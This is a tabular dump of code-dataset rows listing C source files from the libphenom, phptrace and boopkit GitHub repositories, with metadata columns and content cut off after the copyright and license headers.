/* * Copyright 2013 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/thread.c
null
null
null
null
null
null
C
2026-05-04T19:08:26.477768
/* * Copyright 2012-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/timerwheel.c
null
null
null
null
null
null
C
2026-05-04T19:08:26.507466
/* * Copyright 2012 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/variant/json-load.c
null
null
null
null
null
null
C
2026-05-04T19:08:27.576042
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/variant/json-dump.c
null
null
null
null
null
null
C
2026-05-04T19:08:28.663807
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/openssl/ssl_stream.c
null
null
null
null
null
null
C
2026-05-04T19:08:29.044338
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/pipe2.c
null
null
null
null
null
null
C
2026-05-04T19:08:29.044991
/* * Copyright 2012 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/pprintf.c
null
null
null
null
null
null
C
2026-05-04T19:08:29.052378
/* * Copyright 2012 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/streams/fd.c
null
null
null
null
null
null
C
2026-05-04T19:08:29.082785
/* * Copyright 2013 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/pingfd.c
null
null
null
null
null
null
C
2026-05-04T19:08:29.083396
/* * Copyright 2012 Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to...
facebookarchive/libphenom
https://github.com/facebookarchive/libphenom
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
corelib/streams/copy.c
null
null
null
null
null
null
C
2026-05-04T19:08:29.144414
/* * Copyright 2013-present Facebook, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or a...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_filter.c
null
null
null
null
null
null
C
2026-05-04T19:08:36.259988
/** * Copyright 2017 Bing Bai <silkcutbeta@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applic...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_comm.h
null
null
null
null
null
null
C
2026-05-04T19:08:36.282510
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_mmap.h
null
null
null
null
null
null
C
2026-05-04T19:08:36.302107
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_color.h
null
null
null
null
null
null
C
2026-05-04T19:08:36.326264
/** * Copyright 2017 Yuchen Wang <phobosw@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_mmap.c
null
null
null
null
null
null
C
2026-05-04T19:08:36.338771
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_time.h
null
null
null
null
null
null
C
2026-05-04T19:08:36.339317
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_ctrl.c
null
null
null
null
null
null
C
2026-05-04T19:08:36.344117
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_comm.c
null
null
null
null
null
null
C
2026-05-04T19:08:36.367722
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_filter.h
null
null
null
null
null
null
C
2026-05-04T19:08:36.369007
/** * Copyright 2017 Bing Bai <silkcutbeta@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applic...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_ctrl.h
null
null
null
null
null
null
C
2026-05-04T19:08:36.372049
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_type.c
null
null
null
null
null
null
C
2026-05-04T19:08:36.826019
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_type.h
null
null
null
null
null
null
C
2026-05-04T19:08:36.898566
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
common/trace_version.h
null
null
null
null
null
null
C
2026-05-04T19:08:36.989877
/** * Copyright 2017 Yuchen Wang <phobosw@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
deps/sds/testhelp.h
null
null
null
null
null
null
C
2026-05-04T19:08:36.990409
/* This is a really minimal testing framework for C. * * Example: * * test_cond("Check if 1 == 1", 1==1) * test_cond("Check if 5 > 10", 5 > 10) * test_report() * * ---------------------------------------------------------------------------- * * Copyright (c) 2010-2012, Salvatore Sanfilippo <antirez at gmail d...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
extension/php_trace.h
null
null
null
null
null
null
C
2026-05-04T19:08:36.999161
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
src/cli.c
null
null
null
null
null
null
C
2026-05-04T19:08:37.011337
/** * Copyright 2017 Yuchen Wang <phobosw@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
extension/trace.c
null
null
null
null
null
null
C
2026-05-04T19:08:37.013062
/** * Copyright 2017 Qihoo 360 * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to i...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
deps/sds/sds.h
null
null
null
null
null
null
C
2026-05-04T19:08:37.024758
/* SDS (Simple Dynamic Strings), A C dynamic strings library. * * Copyright (c) 2006-2014, Salvatore Sanfilippo <antirez at gmail dot com> * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * ...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
deps/sds/sds.c
null
null
null
null
null
null
C
2026-05-04T19:08:37.025639
/* SDS (Simple Dynamic Strings), A C dynamic strings library. * * Copyright (c) 2006-2014, Salvatore Sanfilippo <antirez at gmail dot com> * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * ...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
src/cli.h
null
null
null
null
null
null
C
2026-05-04T19:08:37.031305
/** * Copyright 2017 Yuchen Wang <phobosw@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
src/ptrace.c
null
null
null
null
null
null
C
2026-05-04T19:08:37.429822
/** * Copyright 2017 Yuchen Wang <phobosw@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
src/ptrace.h
null
null
null
null
null
null
C
2026-05-04T19:08:37.542029
/** * Copyright 2017 Yuchen Wang <phobosw@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
src/status.c
null
null
null
null
null
null
C
2026-05-04T19:08:37.631351
/** * Copyright 2017 Yuchen Wang <phobosw@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
src/status.h
null
null
null
null
null
null
C
2026-05-04T19:08:37.654585
/** * Copyright 2017 Yuchen Wang <phobosw@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
src/trace.h
null
null
null
null
null
null
C
2026-05-04T19:08:37.655069
/** * Copyright 2017 Yuchen Wang <phobosw@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
Qihoo360/phptrace
https://github.com/Qihoo360/phptrace
null
null
null
null
1,668
null
null
apache-2.0
null
null
null
null
null
null
null
src/trace.c
null
null
null
null
null
null
C
2026-05-04T19:08:37.687553
/** * Copyright 2017 Yuchen Wang <phobosw@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applica...
krisnova/boopkit
https://github.com/krisnova/boopkit
null
null
null
null
1,667
null
null
apache-2.0
null
null
null
null
null
null
null
boop/boopkit-boop.c
null
null
null
null
null
null
C
2026-05-04T19:08:40.193382
// Copyright © 2022 Kris Nóva <kris@nivenly.com> // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable l...
krisnova/boopkit
https://github.com/krisnova/boopkit
null
null
null
null
1,667
null
null
apache-2.0
null
null
null
null
null
null
null
dpi.h
null
null
null
null
null
null
C
2026-05-04T19:08:40.200907
// Copyright © 2022 Kris Nóva <kris@nivenly.com> // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable l...